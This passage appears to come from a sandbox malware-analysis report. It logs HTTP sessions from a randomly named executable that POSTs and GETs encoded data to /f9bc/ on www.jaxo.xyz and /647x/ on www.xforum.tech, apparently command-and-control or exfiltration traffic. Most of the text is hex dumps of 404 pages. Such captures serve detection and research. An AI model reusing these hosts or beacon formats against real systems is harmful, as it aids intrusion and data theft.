                  Sep 4, 2024 09:36:59.591617107 CEST1236INData Raw: 20 31 2e 38 34 38 2e 35 30 33 2e 34 39 2e 30 36 39 20 31 2e 30 34 32 2d 2e 31 39 39 2e 38 33 35 2d 2e 34 32 4d 37 33 2e 39 35 36 20 31 30 2e 36 32 36 63 2d 2e 32 33 31 2d 2e 38 33 36 2d 2e 37 33 35 2d 31 2e 32 35 35 2d 31 2e 33 31 36 2d 31 2e 35
                  Data Ascii: 1.848.503.49.069 1.042-.199.835-.42M73.956 10.626c-.231-.836-.735-1.255-1.316-1.507-.24-.104-.5-.147-.75-.1-.148.028-.273.063-.407.161-.032.022-.373.238-.223.161-.282.148-.382.791-.057.979.117.067.22.24.333.325.168.128.336.247.508.364.327.219
                  Sep 4, 2024 09:36:59.591634989 CEST448INData Raw: 30 32 31 2d 2e 30 38 39 20 31 2e 32 38 36 2d 2e 33 31 35 2e 30 39 32 2d 2e 30 37 38 2e 30 38 38 2d 2e 31 38 32 2d 2e 30 33 2d 2e 32 35 35 4d 35 32 2e 39 30 36 20 38 2e 32 39 31 63 2d 2e 31 39 31 2d 2e 32 34 2d 2e 34 30 32 2d 2e 32 30 34 2d 2e 36
                  Data Ascii: 021-.089 1.286-.315.092-.078.088-.182-.03-.255M52.906 8.291c-.191-.24-.402-.204-.634-.28-.218-.073-.326.255-.245.491.117.34.438.509.697.497.26-.01.37-.472.182-.708M80.437 1.283c-.385-.22-.844-.327-1.272-.266-.497.071-.7.363-1.033.724-.356.388.
                  Sep 4, 2024 09:36:59.591672897 CEST1236INData Raw: 2d 2e 35 34 38 2d 2e 34 35 37 2d 2e 34 37 36 2d 2e 35 34 31 2e 30 35 2d 2e 30 37 33 2e 34 35 33 2d 2e 30 35 37 2e 38 37 37 2e 30 31 20 31 2e 33 33 31 2e 30 38 33 2e 35 34 38 2e 32 38 36 2e 38 37 34 2e 35 31 32 20 31 2e 31 37 2e 31 31 2e 31 34 34
                  Data Ascii: -.548-.457-.476-.541.05-.073.453-.057.877.01 1.331.083.548.286.874.512 1.17.11.144.276.048.357-.132.097-.215.088-.476.028-.716M87.395 8c-.77.016-1.317.338-2.032.43-.505.065-.477.525.046.56.713.047 1.359-.082 2.053-.14.468-.04 1.35.253 1.516-.1
                  Sep 4, 2024 09:36:59.596539021 CEST1236INData Raw: 31 31 2e 32 38 36 2d 2e 33 37 2e 33 33 35 2d 2e 37 30 39 2e 30 34 2d 2e 32 37 36 2e 30 35 38 2d 2e 35 35 34 2e 30 37 2d 2e 38 33 36 2e 30 32 34 2d 2e 35 36 38 2d 2e 31 38 39 2d 31 2e 30 35 32 2d 2e 34 36 36 2d 31 2e 33 30 36 4d 31 30 38 2e 34 35
                  Data Ascii: 11.286-.37.335-.709.04-.276.058-.554.07-.836.024-.568-.189-1.052-.466-1.306M108.458 14.127c-.434-.548-.995-.921-1.662-1.103-.746-.203-1.116.933-.445 1.28.216.11.4.251.557.443.204.248.42.648.672.84.348.262.868.645 1.249.23.437-.478-.064-1.305-.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  19192.168.2.44975666.29.149.180805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:37:01.406809092 CEST10835OUTPOST /f9bc/ HTTP/1.1
                  Host: www.jaxo.xyz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.jaxo.xyz
                  Referer: http://www.jaxo.xyz/f9bc/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 10301
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 33 51 6a 6d 58 72 34 64 41 72 65 45 57 62 67 57 37 52 42 50 79 64 63 5a 68 54 6c 65 70 36 56 79 31 61 56 38 68 41 44 34 77 79 41 74 2b 6c 72 43 6f 68 65 41 70 79 65 55 54 41 77 67 77 76 55 34 63 54 52 55 4e 6b 72 73 65 6e 67 6c 33 59 30 56 30 4a 46 35 61 4a 2b 66 33 77 39 35 64 70 50 2b 47 64 2f 54 54 36 74 72 51 30 65 50 50 46 47 38 55 38 79 4c 6d 44 6f 32 44 46 37 32 52 4b 2f 45 48 46 44 78 41 37 51 4b 6d 74 34 59 35 75 59 38 39 43 71 5a 5a 63 7a 4d 42 59 57 33 53 53 51 73 68 56 39 49 62 6e 33 59 56 58 39 66 71 76 78 2b 51 45 33 52 52 68 2b 63 78 6e 79 71 31 67 70 61 6d 6a 57 64 6d 66 6f 77 52 38 53 61 55 74 49 76 2b 72 56 47 6d 36 65 53 7a 45 54 65 2f 42 79 59 58 4a 7a 57 77 79 68 56 67 2b 55 63 42 4a 35 75 69 35 38 64 78 6e 70 53 66 63 63 68 41 4c 6c 51 42 43 47 6d 46 43 6f 53 48 46 44 47 6d 52 73 79 49 78 6b 46 79 59 4a 49 45 73 79 34 31 47 7a 54 69 56 50 4a 39 70 70 52 63 68 55 31 72 49 37 67 75 69 66 4a 34 45 41 6b 4e 36 46 76 53 42 39 76 37 49 4d 38 34 72 71 2b 73 39 52 64 62 [TRUNCATED]
                  Data Ascii: 56gD=3QjmXr4dAreEWbgW7RBPydcZhTlep6Vy1aV8hAD4wyAt+lrCoheApyeUTAwgwvU4cTRUNkrsengl3Y0V0JF5aJ+f3w95dpP+Gd/TT6trQ0ePPFG8U8yLmDo2DF72RK/EHFDxA7QKmt4Y5uY89CqZZczMBYW3SSQshV9Ibn3YVX9fqvx+QE3RRh+cxnyq1gpamjWdmfowR8SaUtIv+rVGm6eSzETe/ByYXJzWwyhVg+UcBJ5ui58dxnpSfcchALlQBCGmFCoSHFDGmRsyIxkFyYJIEsy41GzTiVPJ9ppRchU1rI7guifJ4EAkN6FvSB9v7IM84rq+s9RdbqQ4UXsjrbnuWdALFCLq5sBrWS1dJfgmGnCq6Pbe5pXXsVd2yR3/bZGhMIvS/CWEAcOhWnUhp4HN6UpjzaRH+NMCNJcLOsJWA0pZGp9IAVFHc2GbEJvIJ8Uw22Rsi4NiiPi7LaeEGYunIK/Dnea1OL/VgZ8Ku49v9A7dG221fDbiIrMpjPTV6Xnz8ODHAMWcSiwKHJaX3oxV1pA38tXB9WoFih3Wb1rBfGhN6vM/apC80roizY4FrshY1Nydu1q/e8f8sbTiEo4PC1W/GUSCMW+01UJKtVoDNd5fWXW3vyXrILDDsWqtWB0G1kvPL86eZBQc/UJC9ap8P4MwTF70uaBx06v6anyYW/U1s3kAmTici++KlbmQfIEkE52jiJjuloSRuWKhckRu3zx8ZtV1olz/CCWc9MdHj9cT+bMOd4HprglbJDe9V8fxZccttK90Bu4x40DVS5r9CNV2/LnWIM5UeqQf9I6+ulrKMslZDIkDPc9YqKDoDCSg4A2+2Qi1pnBhczhYekVCpalPelxSXqiM04OQACw3a+64aXDgMfbomY94ppArfkgZD3I01uByJQWQQci3Clsb31G5l4XDWcCDy0Xah7cI0s8/MPdY8vrHRt94EGa2cqrhpqOqpALGhez7GbQd+F0UyDNtoCdXTP3+5Va2oDvJn3T [TRUNCATED]
                  Sep 4, 2024 09:37:02.032790899 CEST1236INHTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:37:01 GMT
                  Server: Apache
                  Content-Length: 13840
                  Connection: close
                  Content-Type: text/html
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                  Sep 4, 2024 09:37:02.032810926 CEST1236INData Raw: 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a 20 20 0a 7d 0a 0a 0a 2e 6d 61 69 6e 7b 0a 20
                  Data Ascii: (30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content: center;}.path { str
                  Sep 4, 2024 09:37:02.032818079 CEST1236INData Raw: 37 37 34 2d 35 2e 34 33 20 31 2e 34 38 33 2d 31 30 2e 37 36 37 20 33 2e 38 30 38 2d 31 36 2e 33 36 39 20 33 2e 38 34 38 2d 35 2e 36 30 31 2e 30 33 38 2d 31 31 2e 37 36 33 2d 33 2d 31 33 2e 33 38 36 2d 38 2e 38 30 38 2d 31 2e 37 30 37 2d 36 2e 31
                  Data Ascii: 774-5.43 1.483-10.767 3.808-16.369 3.848-5.601.038-11.763-3-13.386-8.808-1.707-6.107 2.182-12.41 6.642-16.577 9.072-8.474 21.203-12.707 29.441-22.126 7.927-9.063 11.264-22.574 8.574-34.716-2.692-12.141-11.326-22.538-22.188-26.715-27.683-10.645
                  Sep 4, 2024 09:37:02.032823086 CEST1236INData Raw: 31 2e 30 32 20 35 33 2e 31 35 2e 32 32 35 20 36 39 2e 31 38 38 2d 31 35 2e 36 38 35 20 37 30 2e 35 39 2d 31 38 2e 39 37 37 20 32 2e 36 30 35 2d 36 2e 31 31 38 20 31 2e 38 33 38 2d 32 31 2e 33 32 37 2e 30 36 2d 32 32 2e 32 38 33 2d 31 2e 37 37 37
                  Data Ascii: 1.02 53.15.225 69.188-15.685 70.59-18.977 2.605-6.118 1.838-21.327.06-22.283-1.777-.956-44.044-3.204-72.446-4.057-28.402-.854-49.872-1.968-62.14 4.057" transform="translate(161 68)"/> <path fill="#E6A95F" d="M34.648 167.758c-8
                  Sep 4, 2024 09:37:02.032830954 CEST896INData Raw: 2e 32 33 39 20 36 2e 30 34 37 20 34 32 2e 39 38 39 20 36 2e 36 37 33 20 32 31 2e 37 35 2e 36 32 35 20 35 37 2e 31 32 36 2d 31 2e 36 37 39 20 36 37 2e 34 32 2d 35 2e 34 35 38 20 39 2e 38 30 36 2d 33 2e 35 39 38 20 31 33 2e 36 36 32 2d 37 2e 30 32
                  Data Ascii: .239 6.047 42.989 6.673 21.75.625 57.126-1.679 67.42-5.458 9.806-3.598 13.662-7.027 15.493-5.228 2.396 2.351 1.687 8.008-4.913 12.215-6.252 3.985-27.53 7.2-49.434 7.76-21.904.56-38.604 1.012-49.843-.469" transform="translate(161 68)"/>
                  Sep 4, 2024 09:37:02.032933950 CEST1236INData Raw: 33 2d 2e 36 32 33 4d 32 39 2e 37 39 33 20 39 2e 30 31 32 63 2d 2e 32 36 2d 2e 31 30 38 2d 2e 34 39 38 2e 35 33 32 2d 2e 36 32 2e 39 34 32 2d 2e 31 36 36 2e 35 36 35 2d 2e 32 30 35 20 31 2e 30 33 33 2d 2e 31 34 39 20 31 2e 36 37 34 2e 30 35 33 2e
                  Data Ascii: 3-.623M29.793 9.012c-.26-.108-.498.532-.62.942-.166.565-.205 1.033-.149 1.674.053.59.424.405.493-.048-.002.014.102-.302.138-.4.093-.247.18-.497.262-.76.113-.359.144-1.297-.124-1.408M38.384 6.056c-.737-.211-1.406.211-1.881.674-.53.514-.607 1.19
                  Sep 4, 2024 09:37:02.032944918 CEST1236INData Raw: 20 31 2e 38 34 38 2e 35 30 33 2e 34 39 2e 30 36 39 20 31 2e 30 34 32 2d 2e 31 39 39 2e 38 33 35 2d 2e 34 32 4d 37 33 2e 39 35 36 20 31 30 2e 36 32 36 63 2d 2e 32 33 31 2d 2e 38 33 36 2d 2e 37 33 35 2d 31 2e 32 35 35 2d 31 2e 33 31 36 2d 31 2e 35
                  Data Ascii: 1.848.503.49.069 1.042-.199.835-.42M73.956 10.626c-.231-.836-.735-1.255-1.316-1.507-.24-.104-.5-.147-.75-.1-.148.028-.273.063-.407.161-.032.022-.373.238-.223.161-.282.148-.382.791-.057.979.117.067.22.24.333.325.168.128.336.247.508.364.327.219
                  Sep 4, 2024 09:37:02.032957077 CEST448INData Raw: 30 32 31 2d 2e 30 38 39 20 31 2e 32 38 36 2d 2e 33 31 35 2e 30 39 32 2d 2e 30 37 38 2e 30 38 38 2d 2e 31 38 32 2d 2e 30 33 2d 2e 32 35 35 4d 35 32 2e 39 30 36 20 38 2e 32 39 31 63 2d 2e 31 39 31 2d 2e 32 34 2d 2e 34 30 32 2d 2e 32 30 34 2d 2e 36
                  Data Ascii: 021-.089 1.286-.315.092-.078.088-.182-.03-.255M52.906 8.291c-.191-.24-.402-.204-.634-.28-.218-.073-.326.255-.245.491.117.34.438.509.697.497.26-.01.37-.472.182-.708M80.437 1.283c-.385-.22-.844-.327-1.272-.266-.497.071-.7.363-1.033.724-.356.388.
                  Sep 4, 2024 09:37:02.033037901 CEST1236INData Raw: 2d 2e 35 34 38 2d 2e 34 35 37 2d 2e 34 37 36 2d 2e 35 34 31 2e 30 35 2d 2e 30 37 33 2e 34 35 33 2d 2e 30 35 37 2e 38 37 37 2e 30 31 20 31 2e 33 33 31 2e 30 38 33 2e 35 34 38 2e 32 38 36 2e 38 37 34 2e 35 31 32 20 31 2e 31 37 2e 31 31 2e 31 34 34
                  Data Ascii: -.548-.457-.476-.541.05-.073.453-.057.877.01 1.331.083.548.286.874.512 1.17.11.144.276.048.357-.132.097-.215.088-.476.028-.716M87.395 8c-.77.016-1.317.338-2.032.43-.505.065-.477.525.046.56.713.047 1.359-.082 2.053-.14.468-.04 1.35.253 1.516-.1
                  Sep 4, 2024 09:37:02.033061981 CEST1236INData Raw: 31 31 2e 32 38 36 2d 2e 33 37 2e 33 33 35 2d 2e 37 30 39 2e 30 34 2d 2e 32 37 36 2e 30 35 38 2d 2e 35 35 34 2e 30 37 2d 2e 38 33 36 2e 30 32 34 2d 2e 35 36 38 2d 2e 31 38 39 2d 31 2e 30 35 32 2d 2e 34 36 36 2d 31 2e 33 30 36 4d 31 30 38 2e 34 35
                  Data Ascii: 11.286-.37.335-.709.04-.276.058-.554.07-.836.024-.568-.189-1.052-.466-1.306M108.458 14.127c-.434-.548-.995-.921-1.662-1.103-.746-.203-1.116.933-.445 1.28.216.11.4.251.557.443.204.248.42.648.672.84.348.262.868.645 1.249.23.437-.478-.064-1.305-.
                  Sep 4, 2024 09:37:02.039450884 CEST1236INData Raw: 34 2d 2e 37 39 34 2e 30 32 38 2d 2e 30 33 32 2e 32 39 33 2e 31 30 37 2e 36 31 38 2e 34 38 38 2e 37 33 31 2e 32 32 39 2e 30 36 38 2e 35 33 32 2d 2e 30 33 32 2e 35 30 37 2d 2e 32 35 37 2d 2e 30 32 31 2d 2e 31 38 36 2d 2e 31 33 37 2d 2e 33 32 39 2d
                  Data Ascii: 4-.794.028-.032.293.107.618.488.731.229.068.532-.032.507-.257-.021-.186-.137-.329-.201-.502M70.884 28.197c-.13-.291-.716-.24-.83.025-.131.304-.034.606.41.754.101.033.24.034.334-.012.326-.16.181-.553.086-.767" transform="translate(161 68)"/>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  20192.168.2.44975766.29.149.180805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:37:04.015805006 CEST477OUTGET /f9bc/?56gD=6SLGUfBvDKizOJgh7zQ0wdcCvGBSm89i7oEe4x7u5mEB7F/p7TzH3kWVQQZ5nrAfRyQgCx35fGtmx6dEsYxPA9ia3C50a/z/OeG1bPlxFxHVM2abTu6B/y8=&gTSpc=Khb8pT HTTP/1.1
                  Host: www.jaxo.xyz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Sep 4, 2024 09:37:04.569159031 CEST1236INHTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:37:04 GMT
                  Server: Apache
                  Content-Length: 13840
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                  Sep 4, 2024 09:37:04.569180012 CEST224INData Raw: 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 58 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a
                  Data Ascii: nsform: rotateX(30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify
                  Sep 4, 2024 09:37:04.569190025 CEST1236INData Raw: 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 70 61 74 68 20 7b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 20 33 30 30 3b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 33 30 30 3b 0a 20 20
                  Data Ascii: -content: center;}.path { stroke-dasharray: 300; stroke-dashoffset: 300; animation: dash 4s alternate infinite;}@keyframes dash{ 0%, 30%{ fill: 4B4B62; stroke-dashoffset: 0; } 80%,100%{ fill: transparent;
                  Sep 4, 2024 09:37:04.569200993 CEST1236INData Raw: 32 32 2e 35 33 38 2d 32 32 2e 31 38 38 2d 32 36 2e 37 31 35 2d 32 37 2e 36 38 33 2d 31 30 2e 36 34 35 2d 35 37 2e 38 34 34 20 31 38 2e 33 37 37 2d 38 36 2e 31 35 32 20 39 2e 38 37 33 2d 32 2e 31 30 31 2d 2e 36 33 2d 34 2e 33 31 32 2d 31 2e 36 30
                  Data Ascii: 22.538-22.188-26.715-27.683-10.645-57.844 18.377-86.152 9.873-2.101-.63-4.312-1.605-5.418-3.641-1.08-1.988-.834-4.51-.214-6.716 3.468-12.348 16.939-20.21 17.528-33.102.32-7.008-3.504-13.564-8.325-18.251-33.126-32.2-81.125 6.102-114.9 18.194-55
                  Sep 4, 2024 09:37:04.569217920 CEST1236INData Raw: 6c 6c 3d 22 23 45 36 41 39 35 46 22 20 64 3d 22 4d 33 34 2e 36 34 38 20 31 36 37 2e 37 35 38 63 2d 38 2e 38 36 33 2d 31 2e 35 32 36 2d 32 33 2e 35 31 35 2d 36 2e 39 33 39 2d 33 30 2e 32 39 32 2d 31 34 2e 32 31 38 2d 36 2e 37 37 35 2d 37 2e 32 38
                  Data Ascii: ll="#E6A95F" d="M34.648 167.758c-8.863-1.526-23.515-6.939-30.292-14.218-6.775-7.28-2.096-8.803 3.508-5.387 5.605 3.415 24.569 11.557 54.124 12.263 29.555.706 61.424-6.946 72.2-17.053 0 0 2.705-1.47 2.768 1.509.062 2.98.428 7.948-2.769 10.507-3
                  Sep 4, 2024 09:37:04.569228888 CEST1236INData Raw: 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 36 31 20 36 38 29 22 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 46 46 45 41 44 34 22 20 64 3d 22 4d 34 35 2e 35 30 38 20 31 33 2e 31 31 34 63
                  Data Ascii: form="translate(161 68)"/> <path fill="#FFEAD4" d="M45.508 13.114c-.368.549-.54 1.598-.503 2.445.017.392.297.604.45.287.143-.297.222-.617.303-.978.087-.387.197-.735.238-1.15.042-.44-.257-.95-.488-.604M42.092 9.016c-.694.13-1.44
                  Sep 4, 2024 09:37:04.569240093 CEST1236INData Raw: 20 32 2e 33 38 31 2d 2e 30 30 35 2e 34 37 2e 33 33 33 2e 37 34 39 2e 34 37 2e 33 35 2e 32 30 36 2d 2e 35 39 32 2e 34 32 32 2d 31 2e 33 34 2e 35 31 37 2d 32 2e 30 34 37 2e 30 38 32 2d 2e 35 39 38 2d 2e 32 35 33 2d 2e 39 32 31 2d 2e 34 37 34 2d 2e
                  Data Ascii: 2.381-.005.47.333.749.47.35.206-.592.422-1.34.517-2.047.082-.598-.253-.921-.474-.684M38.964 14.6c-.26-.324-1.293-.581-2.192-.6-.626-.012-.971.28-.65.452.459.244 1.155.57 2.063.547.56-.014.936-.205.78-.4M51.58 3.028c-.54-.1-.912.074-1.399.401-
                  Sep 4, 2024 09:37:04.569283009 CEST1120INData Raw: 30 32 34 63 2d 2e 34 32 33 2e 32 31 32 2d 2e 35 38 20 31 2e 33 35 32 2d 2e 35 32 33 20 32 2e 31 37 34 2e 30 36 36 2e 39 34 36 2e 36 36 34 20 31 2e 31 33 2e 37 38 35 2e 31 34 34 2e 30 36 35 2d 2e 35 33 38 2e 32 32 2d 31 2e 30 34 31 2e 32 30 33 2d
                  Data Ascii: 024c-.423.212-.58 1.352-.523 2.174.066.946.664 1.13.785.144.065-.538.22-1.041.203-1.612-.016-.528-.238-.82-.465-.706M15.946 21.201c-.04-.142-.134-.197-.214-.2-.311-.02-.464.621-.576 1.05-.124.468-.188.945-.14 1.461.053.562.486.699.57.088.053-.
                  Sep 4, 2024 09:37:04.569293976 CEST1236INData Raw: 2e 33 36 36 2d 31 2e 37 30 33 2d 2e 31 30 32 2d 2e 35 34 38 2d 2e 34 35 37 2d 2e 34 37 36 2d 2e 35 34 31 2e 30 35 2d 2e 30 37 33 2e 34 35 33 2d 2e 30 35 37 2e 38 37 37 2e 30 31 20 31 2e 33 33 31 2e 30 38 33 2e 35 34 38 2e 32 38 36 2e 38 37 34 2e
                  Data Ascii: .366-1.703-.102-.548-.457-.476-.541.05-.073.453-.057.877.01 1.331.083.548.286.874.512 1.17.11.144.276.048.357-.132.097-.215.088-.476.028-.716M87.395 8c-.77.016-1.317.338-2.032.43-.505.065-.477.525.046.56.713.047 1.359-.082 2.053-.14.468-.04 1.
                  Sep 4, 2024 09:37:04.569305897 CEST1236INData Raw: 31 35 2e 35 33 2e 33 30 34 2e 31 30 38 2d 2e 31 31 2e 32 38 36 2d 2e 33 37 2e 33 33 35 2d 2e 37 30 39 2e 30 34 2d 2e 32 37 36 2e 30 35 38 2d 2e 35 35 34 2e 30 37 2d 2e 38 33 36 2e 30 32 34 2d 2e 35 36 38 2d 2e 31 38 39 2d 31 2e 30 35 32 2d 2e 34
                  Data Ascii: 15.53.304.108-.11.286-.37.335-.709.04-.276.058-.554.07-.836.024-.568-.189-1.052-.466-1.306M108.458 14.127c-.434-.548-.995-.921-1.662-1.103-.746-.203-1.116.933-.445 1.28.216.11.4.251.557.443.204.248.42.648.672.84.348.262.868.645 1.249.23.437-.4
                  Sep 4, 2024 09:37:04.574182034 CEST1236INData Raw: 37 2d 2e 32 39 32 2d 2e 37 35 37 2d 2e 33 30 34 2d 2e 37 39 34 2e 30 32 38 2d 2e 30 33 32 2e 32 39 33 2e 31 30 37 2e 36 31 38 2e 34 38 38 2e 37 33 31 2e 32 32 39 2e 30 36 38 2e 35 33 32 2d 2e 30 33 32 2e 35 30 37 2d 2e 32 35 37 2d 2e 30 32 31 2d
                  Data Ascii: 7-.292-.757-.304-.794.028-.032.293.107.618.488.731.229.068.532-.032.507-.257-.021-.186-.137-.329-.201-.502M70.884 28.197c-.13-.291-.716-.24-.83.025-.131.304-.034.606.41.754.101.033.24.034.334-.012.326-.16.181-.553.086-.767" transform="translat


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  21192.168.2.449758103.224.182.242805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:37:09.917349100 CEST742OUTPOST /647x/ HTTP/1.1
                  Host: www.xforum.tech
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.xforum.tech
                  Referer: http://www.xforum.tech/647x/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 201
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
